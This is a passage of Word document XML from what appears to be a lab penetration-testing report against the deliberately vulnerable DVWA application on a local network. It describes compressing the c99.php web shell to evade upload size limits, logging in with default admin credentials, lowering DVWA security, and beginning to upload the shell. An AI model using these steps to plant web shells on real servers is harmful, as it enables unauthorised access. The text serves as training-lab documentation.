      <w:r w:rsidR="00784336">
        <w:t xml:space="preserve">using the </w:t>
      </w:r>
      <w:r w:rsidR="00784336">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">gzip c99.php </w:t>
      </w:r>
      <w:r w:rsidR="00784336">
        <w:t>command because</w:t>
      </w:r>
      <w:r w:rsidR="008458F1">
        <w:t xml:space="preserve"> numerous web servers </w:t>
      </w:r>
      <w:r w:rsidR="00AC1EF0">
        <w:t>do not</w:t>
      </w:r>
      <w:r w:rsidR="008458F1">
        <w:t xml:space="preserve"> allow uploading files that exceed 10,000 bytes</w:t>
      </w:r>
      <w:r w:rsidR="00D74A17">
        <w:t xml:space="preserve">. Then, we listed the contents of </w:t>
      </w:r>
      <w:r w:rsidR="00D74A17" w:rsidRPr="00146A6F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/root/backdoor</w:t>
      </w:r>
      <w:r w:rsidR="00D74A17">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D74A17">
        <w:t>directory in a long listing format including the hidden files sorted by modification time in the reverse order</w:t>
      </w:r>
      <w:r w:rsidR="00AC1EF0">
        <w:t xml:space="preserve"> by using the </w:t>
      </w:r>
      <w:r w:rsidR="00AC1EF0" w:rsidRPr="00AC1EF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ls -lrta</w:t>
      </w:r>
      <w:r w:rsidR="00AC1EF0">
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5DCC70" w14:textId="1239ECF2" w:rsidR="00312AFB" w:rsidRDefault="008A536F" w:rsidP="00312AFB">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251744256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E06C7D1" wp14:editId="5C3573D8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-9525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>531495</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4991100" cy="1276350"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="483" name="Flowchart: Alternate Process 483"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4991100" cy="1276350"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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5868B6" id="Flowchart: Alternate Process 483" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:-.75pt;margin-top:41.85pt;width:393pt;height:100.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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251742208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44316D32" wp14:editId="633773AA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1905</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3181350" cy="190500"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="482" name="Flowchart: Alternate Process 482"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3181350" cy="190500"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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D0004" id="Flowchart: Alternate Process 482" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:0;margin-top:-.15pt;width:250.5pt;height:1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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00816961">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26DABFFE" wp14:editId="5ABF5340">
            <wp:extent cx="5905500" cy="3813661"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="458" name="Picture 45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3.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId18">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="743" t="23968" r="58308" b="29020"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5951044" cy="3843073"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="293EC1E1" w14:textId="3589751A" w:rsidR="00C10ADF" w:rsidRPr="00213E5D" w:rsidRDefault="00312AFB" w:rsidP="00213E5D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312AFB">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00312AFB">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00312AFB">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00312AFB">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00312AFB">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00312AFB">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Viewing the contents of </w:t>
      </w:r>
      <w:r w:rsidRPr="00312AFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/root/backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="00312AFB">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, editing the first line of </w:t>
      </w:r>
      <w:r w:rsidRPr="00312AFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">c99.php </w:t>
      </w:r>
      <w:r w:rsidRPr="00312AFB">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">and compressing it to </w:t>
      </w:r>
      <w:r w:rsidRPr="00312AFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>c99.php.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240C4372" w14:textId="77777777" w:rsidR="00F2786E" w:rsidRDefault="00F2786E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="064AE36C" w14:textId="202A3FF7" w:rsidR="0028153C" w:rsidRDefault="006E00C7" w:rsidP="00DC573E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc41839630"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Logging into the </w:t>
      </w:r>
      <w:r w:rsidR="0027516E">
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eb </w:t>
      </w:r>
      <w:r w:rsidR="0027516E">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>erver</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="4EF0D34D" w14:textId="380B1292" w:rsidR="004F68F6" w:rsidRPr="00E44E6C" w:rsidRDefault="00E44E6C" w:rsidP="004F68F6">
      <w:r w:rsidRPr="00E44E6C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>192.168.43.174</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76D63">
        <w:t>is the IP Ad</w:t>
      </w:r>
      <w:r w:rsidR="001841CD">
        <w:t xml:space="preserve">dress of the web server. </w:t>
      </w:r>
      <w:r w:rsidR="00367E80" w:rsidRPr="00E44E6C">
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="00367E80">
        <w:t xml:space="preserve"> used Firefox</w:t>
      </w:r>
      <w:r w:rsidR="00C40B2B">
        <w:t xml:space="preserve"> to browse to</w:t>
      </w:r>
      <w:r w:rsidR="00000BC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00000BC6" w:rsidRPr="00000BC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>http://192.168.43.174/dvwa/login.php</w:t>
      </w:r>
      <w:r w:rsidR="00C40B2B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00000BC6">
        <w:t xml:space="preserve">which is </w:t>
      </w:r>
      <w:r w:rsidR="00C40B2B">
        <w:t xml:space="preserve">the login page </w:t>
      </w:r>
      <w:r w:rsidR="00000BC6">
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="00C40B2B">
        <w:t xml:space="preserve"> the web server</w:t>
      </w:r>
      <w:r w:rsidR="00000BC6">
        <w:t xml:space="preserve"> and logged in as </w:t>
      </w:r>
      <w:r w:rsidR="00150AC0" w:rsidRPr="00150AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Admin</w:t>
      </w:r>
      <w:r w:rsidR="00150AC0">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidR="00150AC0" w:rsidRPr="00AA7E51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00150AC0">
        <w:t xml:space="preserve"> as</w:t>
      </w:r>
      <w:r w:rsidR="00AA7E51">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00150AC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00150AC0" w:rsidRPr="00AA7E51">
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00150AC0">
        <w:t>, these credentials were provided by Websters</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2618DAB0" w14:textId="2D79A9AA" w:rsidR="00F2786E" w:rsidRDefault="00192612" w:rsidP="00F2786E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251703296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F6EB3CE" wp14:editId="0D05E7ED">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1085850</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>254635</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1228725" cy="142875"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="459" name="Flowchart: Alternate Process 459"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1228725" cy="142875"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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FEB5C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59" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:85.5pt;margin-top:20.05pt;width:96.75pt;height:11.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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004F68F6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F62C20F" wp14:editId="4B7D78A5">
            <wp:extent cx="5943373" cy="2495550"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId19">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5314" b="20039"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2495645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B6BB98" w14:textId="67694074" w:rsidR="006E00C7" w:rsidRPr="006E00C7" w:rsidRDefault="00F2786E" w:rsidP="00F2786E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Logging in to the web server as</w:t>
      </w:r>
      <w:r w:rsidRPr="00F2786E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDBF54C" w14:textId="77777777" w:rsidR="00F60B3A" w:rsidRDefault="00F60B3A" w:rsidP="008B38A9"/>
    <w:p w14:paraId="18C4F4E9" w14:textId="77777777" w:rsidR="00FA7591" w:rsidRDefault="00FA7591">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F6C410" w14:textId="295764DB" w:rsidR="00602428" w:rsidRPr="000420CA" w:rsidRDefault="00602428" w:rsidP="00F60B3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc41839631"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Setting the Security Level as Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="34E40C35" w14:textId="0578C459" w:rsidR="00FA7591" w:rsidRPr="00FA7591" w:rsidRDefault="00A01EFC" w:rsidP="007732A8">
      <w:r>
        <w:t xml:space="preserve">Under DVWA (Damn Vulnerable Web Application) </w:t>
      </w:r>
      <w:r w:rsidR="009B41D3">
        <w:t xml:space="preserve">Security, we set the security level as </w:t>
      </w:r>
      <w:r w:rsidR="009B41D3" w:rsidRPr="009B41D3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r w:rsidR="009B41D3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B41D3">
        <w:t xml:space="preserve">and hit </w:t>
      </w:r>
      <w:r w:rsidR="009B41D3" w:rsidRPr="00663802">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>submit</w:t>
      </w:r>
      <w:r w:rsidR="00253A82">
        <w:t xml:space="preserve"> to check how </w:t>
      </w:r>
      <w:r w:rsidR="00663802">
        <w:t>we can</w:t>
      </w:r>
      <w:r w:rsidR="00253A82">
        <w:t xml:space="preserve"> attack when the security of the web server is </w:t>
      </w:r>
      <w:r w:rsidR="00253A82" w:rsidRPr="00253A82">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r w:rsidR="00FA7591">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F132DE3" w14:textId="4B9157C1" w:rsidR="0046358A" w:rsidRDefault="00192612" w:rsidP="00FA7591">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251705344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="149ED4D1" wp14:editId="02F0E6DF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>2419350</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2372360</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="571500" cy="190500"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="460" name="Flowchart: Alternate Process 460"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="571500" cy="190500"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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745FF" id="Flowchart: Alternate Process 460" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:190.5pt;margin-top:186.8pt;width:45pt;height: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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0046358A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44263CCE" wp14:editId="000C2DE5">
            <wp:extent cx="5907974" cy="3888404"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Picture 1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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId20">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5109" r="22259" b="3928"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6041915" cy="3976559"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A08BD30" w14:textId="64E5BDEA" w:rsidR="00F60B3A" w:rsidRDefault="00F60B3A" w:rsidP="00F60B3A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Setting DVWA security to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F60B3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0ECD79" w14:textId="25637FB2" w:rsidR="0028153C" w:rsidRDefault="0028153C" w:rsidP="00B672A2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="10" w:name="_Toc41839632"/>
      <w:r w:rsidR="00ED7FBA">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Uploading </w:t>
      </w:r>
      <w:r w:rsidR="00A4007D">
        <w:t>c99.php.gz</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="24CB9D5F" w14:textId="5D986A90" w:rsidR="006749E6" w:rsidRDefault="00CC2A7D" w:rsidP="00FA7591">
      <w:r>
        <w:t xml:space="preserve">We navigated to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2A7D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Upload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and clicked on </w:t>
      </w:r>
      <w:r w:rsidR="006749E6" w:rsidRPr="006749E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Browse</w:t>
      </w:r>
      <w:r w:rsidR="006749E6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AEE8C0" w14:textId="7526986B" w:rsidR="00FA7591" w:rsidRDefault="00192612" w:rsidP="006749E6">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251707392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7857F91F" wp14:editId="553486BC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>2428874</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1613535</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="542925" cy="133350"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="461" name="Flowchart: Alternate Process 461"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="542925" cy="133350"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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F5CAA" id="Flowchart: Alternate Process 461" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:191.25pt;margin-top:127.05pt;width:42.75pt;height:10.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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FA7591">
        <w:rPr>
